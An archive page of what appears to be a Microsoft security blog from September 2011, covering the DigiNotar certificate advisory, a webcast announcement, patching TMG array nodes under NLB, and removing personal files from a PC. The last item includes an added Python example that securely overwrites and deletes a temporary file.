
Dave Forstrom,

Director, Trustworthy Computing

Categories: Uncategorized Tags:

2607712 – Fraudulent Digital Certificates Could Allow Spoofing – Version: 5.0

Revision Note: V5.0 (September 19, 2011): Revised to announce the rerelease of the KB2616676 update. See the Update FAQ in this advisory for more information.
Summary: Microsoft is aware of active attacks using at least one fraudulent digital certificate issued by DigiNotar, a certification authority present in the Trusted Root Certification Authorities Store. A fraudulent certificate could be used to spoof content, perform phishing attacks, or perform man-in-the-middle attacks against all Web browser users including users of Internet Explorer. While this is not a vulnerability in a Microsoft product, this issue affects all supported releases of Microsoft Windows.

Categories: Uncategorized Tags:

Q&A from the September 2011 Security Bulletin Webcast

September 16th, 2011 No comments

Hello,

Today we published the September Security Bulletin Webcast Questions & Answers page. We fielded 15 questions, primarily regarding the DigiNotar certificate compromise and the associated Security Advisory. There was one question that we were unable to answer during the webcast due to time constraints; all questions and answers are included on the Q&A page.

We invite our customers to join us for the next public webcast on Wednesday, October 12th at 11 a.m. PDT (UTC -7), when we will go into detail about the October bulletin release and answer questions live on the air.

Customers can register to attend at the link below:

Date: Wednesday, October 12, 2011
Time: 11:00 a.m. PDT (UTC -7)
Register:
Attendee Registration


Thanks –

Jerry Bryant

Group Manager, Response Communications
Trustworthy Computing Group

How to patch a TMG array– some thoughts on NLB high availability

September 16th, 2011 No comments

One of the reasons for using an array is the availability of NLB, which is known to provide fault tolerance and load balancing.

NLB relies on heartbeats to determine whether the cluster nodes are alive. The nodes divide the potential client IP addresses among themselves (more precisely, hashes of the client IPs) and exchange heartbeats, so each member knows the others are up and running.

As soon as a node is down (fails to send the heartbeats), the remaining nodes take ownership over the failing node’s IP hashes, providing coverage for all the clients normally served by the broken node.

How does this all relate to patching?

For new connections, the above behavior is straightforward, but what if we just “unplug” one of our TMG machines? What happens to existing connections served by this box? No other node will be aware of the state of these connections, so essentially they will simply fail.

This is exactly what happens if you just all of a sudden patch and reboot one of your TMG nodes.

How can we circumvent this? Is there any workaround?

In general, NLB supports what is called “drain mode”.

When you drainstop a node, NLB still serves the existing connections owned by that node but stops accepting new ones; new connections are handled by the other available nodes in the array.

So if you are intentionally taking a node offline, drainstop it first and let the active connections finish before you take it down for patching.

Therefore, when patching a particular TMG node, ideally you will:

1. drain the node, wait until the session count drops to zero (sessions tab)

2. suspend it (so that NLB won’t be automatically started on next reboot)

3. patch the node

4. make sure the system operates properly with the patch

5. start NLB again to make the node join the array again

Here is a screenshot of the NLB options available in the TMG Management console:


Reference:

http://technet.microsoft.com/en-us/library/cc725691.aspx

Authors
Balint Toth
Support Escalation Engineer
Microsoft CSS Forefront Edge Team

Technical Reviewer
Eric Detoc
Escalation Engineer
Microsoft CSS Forefront Edge Team

Categories: Uncategorized Tags:

Remove personal files from your PC

September 15th, 2011 No comments

Last month, we told you how to recycle an old PC more safely. We suggested that you use an authorized refurbisher or disk-cleaning software to make sure that all of your personal information was removed from your computer before you gave it away.

Since we posted that information, we’ve received some feedback asking us to go into more detail about how you can remove this information yourself.

Empty your recycle bin. It’s not enough to delete files and send them to your computer’s recycle bin; you also have to empty the bin. To do this, right-click the Recycle Bin on your desktop and click Empty Recycle Bin. This sounds pretty basic, but it is easy to forget.

Delete documents that might contain sensitive or personal information. Do you keep a password file on your computer? How about tax or other financial records? Delete these and other personal documents before you give away your computer. Then empty your recycle bin…again.

Delete your Internet browser’s cache, cookies, and history. If some websites have saved your password so you can log in quickly, make sure you delete it from all of those websites, so a hacker can’t do the same. Learn how to delete your browsing history in Internet Explorer. And then empty your recycle bin again. It’s fun!

It’s not enough just to empty the recycle bin. What? But you’ve gotten so good at it. The truth is that emptying the recycle bin only protects your personal information from inexperienced data thieves: deleting a file removes its directory entry, not the data blocks on the disk, and anyone with recovery software can read what is still there. To be safe, use software that overwrites your information with random ones and zeros. You can get some recommendations for free and inexpensive software in this article, about how to protect and purge your personal files.
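What such overwriting software does is small enough to show. The following Python is an added example, not Microsoft's and not any of the tools the article recommends: it overwrites a file in place with random bytes and then zeros, forces each pass to disk, truncates, and only then deletes. The throwaway file it wipes is created by the example itself.

```python
import os
import tempfile


def overwrite_and_delete(path, passes=3, chunk=1 << 16):
    """Overwrite a file's contents in place (random data, then a final pass of
    zeros), sync each pass to disk, truncate and unlink. Returns the number of
    bytes overwritten. Caveat: on SSDs, copy-on-write or journaling file
    systems and cloud-synced folders the old blocks may survive elsewhere; for
    those, full-disk encryption with the key discarded, or the drive's own
    secure-erase command, is the reliable route."""
    size = os.path.getsize(path)
    with open(path, "r+b") as f:
        for p in range(passes):
            f.seek(0)
            remaining = size
            while remaining:
                n = min(chunk, remaining)
                f.write(os.urandom(n) if p < passes - 1 else b"\x00" * n)
                remaining -= n
            f.flush()
            os.fsync(f.fileno())      # make the pass reach the disk, not just the cache
        f.truncate(0)
        f.flush()
        os.fsync(f.fileno())
    os.remove(path)
    return size


def demo():
    """Create a throwaway file with 'sensitive' content, wipe it, and report
    (bytes overwritten, whether the file still exists)."""
    fd, path = tempfile.mkstemp()
    with os.fdopen(fd, "wb") as f:
        f.write(b"password=hunter2\n" * 1000)     # constructed content
    wiped = overwrite_and_delete(path)
    return wiped, os.path.exists(path)


if __name__ == "__main__":
    print(demo())   # (17000, False)
```

Note that this only reaches the file's current blocks: earlier copies left by editors, backups, the page file or the browser cache are untouched, which is why the article's advice for a machine you are giving away is a whole-disk wipe rather than per-file deletion.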

More information about how to prevent fraud.